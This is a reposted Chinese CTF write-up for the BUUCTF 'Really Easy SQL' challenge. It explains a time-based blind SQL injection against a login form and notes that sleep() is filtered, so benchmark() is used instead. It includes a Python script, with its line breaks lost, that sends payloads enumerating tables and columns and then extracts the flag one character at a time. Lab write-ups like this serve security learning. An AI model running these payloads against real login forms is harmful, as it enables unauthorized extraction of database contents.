您的位置:首页 > 科技 > 能源 > 【BUU】[Dest0g3 520迎新赛]Really Easy SQL

【BUU】[Dest0g3 520迎新赛]Really Easy SQL

2024/12/23 8:00:51 来源:https://blog.csdn.net/qq_30817059/article/details/141194274  浏览:    关键词:【BUU】[Dest0g3 520迎新赛]Really Easy SQL

2024/8/14

[Dest0g3 520迎新赛]Really Easy SQL

题目标题说明是SQL注入
题目首页
image.png
页面title显示是钓鱼站点。

钓鱼站点主要为将我们的输入信息保存在数据库。后台应该是插入语句。
这里无论输入什么都显示密码错误, 只能尝试盲注,基于时间的盲注,
这里经过测试payload如下,
image.png
然后写脚本内容如下

import requests
import time
from urllib.parse import urlencodeurl="http://c3a1a543-3a1c-4f1c-9e6b-1fd5fcf8b280.node5.buuoj.cn:81/"
flag=''
for i in range(1,44):for j in range(40,137):#payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #flaggg,user#payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #cmdpayload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j)data={'username': 'a','password': payload}print(data)try:r = requests.post(url=url,data=data,timeout=0.2)except:flag += chr(j)print(flag)breaktime.sleep(0.2)time.sleep(1)

跑到flag。这道题目挺花时间的,主要在于sleep()函数被过滤了.如果在测试的过程中没有意识到这个问题,那么就会花费大量的时间。
image.png
成功解答
image.png

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com